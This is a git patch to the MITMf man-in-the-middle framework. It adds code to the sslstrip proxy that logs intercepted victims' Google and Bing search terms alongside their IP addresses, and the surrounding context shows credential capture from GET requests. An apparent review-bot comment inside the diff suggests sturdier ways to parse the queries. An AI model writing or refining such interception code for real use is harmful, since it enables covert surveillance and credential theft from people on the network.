From 58bd73bb28d0e142485f6b4c4df8a87508ab4c1e Mon Sep 17 00:00:00 2001
From: byt3bl33d3r
Date: Mon, 15 Dec 2014 19:46:32 +0100
Subject: [PATCH] fixed bug, MITMf now logs search engine queries
---
 libs/sslstrip/ServerConnection.py | 25 +++++++++++++++++++++++++
 libs/sslstripplus/ServerConnection.py | 1 -
 2 files changed, 25 insertions(+), 1 deletion(-)
diff --git a/libs/sslstrip/ServerConnection.py b/libs/sslstrip/ServerConnection.py
index 48e2e63..c4900b8 100644
--- a/libs/sslstrip/ServerConnection.py
+++ b/libs/sslstrip/ServerConnection.py
@@ -70,6 +70,31 @@ class ServerConnection(HTTPClient):
 else:
 logging.info(message)
 
+ #Capture google searches
+ if ('google' in self.headers['host']):
+ if ('search' in self.uri): #and ('search' in self.uri):
+ try:
+ for param in self.uri.split('&'):
+ if param.split('=')[0] == 'q':
+ query = str(param.split('=')[1])
+ if query:
+ logging.info("%s is querying %s for %s" % (self.client.getClientIP(), self.headers['host'], query))
+ except Exception, e:
+ error = str(e)
+ logging.warning("%s Error parsing google search query %s" % (self.client.getClientIP(), error))
+
+ if ('bing' in self.headers['host']):
+ if ('Suggestions' in self.uri):
+ try:
+ for param in self.uri.split('&'):
+ if param.split('=')[0] == 'qry':
+ query = str(param.split('=')[1])
+ if query:
+ logging.info("%s is querying %s for %s" % (self.client.getClientIP(), self.headers['host'], query))
+ except Exception, e:
+ error = str(e)
+ logging.warning("%s Error parsing bing search query %s" % (self.client.getClientIP(), error))
+
 #check for creds passed in GET requests.. It's surprising to see how many people still do this (please stahp)
 for user in self.http_userfields:
 username = re.findall("("+ user +")=([^&|;]*)", self.uri, re.IGNORECASE)
diff --git a/libs/sslstripplus/ServerConnection.py b/libs/sslstripplus/ServerConnection.py
index 032585f..ca7498a 100644
--- a/libs/sslstripplus/ServerConnection.py
+++ b/libs/sslstripplus/ServerConnection.py
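Review bot: In libs/sslstrip/ServerConnection.py the added Google and Bing branches parse the query string by hand: if `self.uri` is path plus query, `self.uri.split('&')` leaves a leading `q`/`qry` fused to the path so it never matches, and `param.split('=')[1]` raises IndexError on a parameter without `=`, which the broad `except Exception` turns into a warning that ends the loop. Parsing once with `params = urlparse.parse_qs(urlparse.urlparse(self.uri).query)` and reading `params.get('q', [''])[0]` covers both cases (it needs `import urlparse` if the module lacks it); because that also percent-decodes, format the value with `%r` so decoded control characters cannot forge log lines. `self.headers['host']` is read outside the `try`, so a request without a Host header would raise KeyError here unless earlier code guarantees the key; `self.headers.get('host', '')` avoids that. The log now pairs client IPs with search terms, so the file should be treated as sensitive data with restricted access. The enclosing method starts and ends outside the hunk.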
@@ -46,7 +46,6 @@ class ServerConnection(HTTPClient):
 self.headers = headers
 self.client = client
 self.urlMonitor = URLMonitor.getInstance()
- self.responseTamperer = ResponseTampererFactory.getTampererInstance()
 self.plugins = ProxyPlugins.getInstance()
 self.isImageRequest = False
 self.isCompressed = False